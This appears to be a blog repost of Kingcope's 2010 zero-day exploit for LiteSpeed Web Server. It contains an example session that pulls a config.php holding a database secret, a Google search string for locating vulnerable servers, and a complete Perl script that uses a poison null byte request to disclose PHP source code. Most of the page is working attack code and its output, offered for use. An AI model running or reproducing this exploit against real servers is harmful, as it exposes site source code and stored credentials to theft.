Litespeed Technologies Web Server Remote Poison null byte Zero-Daydiscovered and exploited by Kingcope in June 2010 |
google gives me over 9million hits |
Example exploit session: |
%nc 192.168.2.19 80 |
HEAD / HTTP/1.0 |
HTTP/1.0 200 OK |
Date: Sun, 13 Jun 2010 00:10:38 GMT |
Server: LiteSpeed <-- consider it 0wned |
Accept-Ranges: bytes |
Connection: close |
ETag: "6ff-4c12e288-a3ee" |
Last-Modified: Sat, 12 Jun 2010 01:27:36 GMT |
Content-Type: text/html |
Content-Length: 1791 |
%fetch http://192.168.2.19/config.php |
config.php 0 B 0 Bps |
%cat config.php |
%/usr/local/bin/perl Litespeed.pl 192.168.2.19 config.php |
LiteSpeed Technologies Web Server Remote Source Code Disclosure Exploit |
By Kingcope |
June 2010 |
Saving source code of config.php into 192.168.2.19-config.php |
Completed. |
Operation Completed :>. |
%cat 192.168.2.19-config.php |
|
$db_secret="TOP SECRET PASSWORD"; |
?> |
% |
Exploit: |
#!/usr/bin/perl |
# |
#LiteSpeed Technologies Web Server Remote Source Code Disclosure zero-day Exploit |
#By Kingcope |
#Google search: ""Proudly Served by LiteSpeed Web Server"" |
#June 2010 |
#Thanks to TheDefaced for the idea, http://www.milw0rm.com/exploits/4556 |
# |
use IO::Socket; |
use strict; |
sub getphpsrc { |
my $host = shift; |
my $file = shift; |
if (substr($file, 0, 1) eq "/") { |
$file = substr($file, 1); |
} |
my $file2 = $file; |
$file2 =~ s/\//_/g; |
print "Saving source code of $file into $host-$file2\n"; |
my $sock = IO::Socket::INET->new(PeerAddr => $host, |
PeerPort => '80', |
Proto => 'tcp') || die("Could not connect |
to $ARGV[0]"); |
print $sock "GET /$file\x00.txt HTTP/1.1\r\nHost: $ARGV[0]\r\nConnection: |
close\r\n\r\n"; |
my $buf = ""; |
my $lpfound = 0; |
my $saveme = 0; |
my $savveme = 0; |
while(<$sock>) { |
if ($_ =~ /LiteSpeed/) { |
$lpfound = 1; |
} |
if ($saveme == 2) { |
$savveme = 1; |
} |
if ($saveme != 0 && $savveme == 0) { |
$saveme++; |
} |
if ($_ =~ /Content-Length:/) { |
$saveme = 1; |
} |
if ($savveme == 1) { |
$buf .= $_; |
} |
} |
if ($lpfound == 0) { |
print "This does not seem to be a LiteSpeed Webserver, saving file anyways.\n"; |
} |
open FILE, ">$host-$file2"; |
print FILE $buf; |
close FILE; |
print "Completed.\n"; |
} |
print "LiteSpeed Technologies Web Server Remote Source Code Disclosure Exploit\n"; |
print "By Kingcope\n"; |
print "June 2010\n\n"; |
if ($#ARGV != 1) { |
print "Usage: perl litespeed.pl ; |
print "Example: perl litespeed.pl www.thedomain.com index.php\n"; |
exit(0); |
} |
getphpsrc($ARGV[0], $ARGV[1]); |
print "Operation Completed :>.\n";Explot Url
Hiç yorum yok :
Yorum Gönder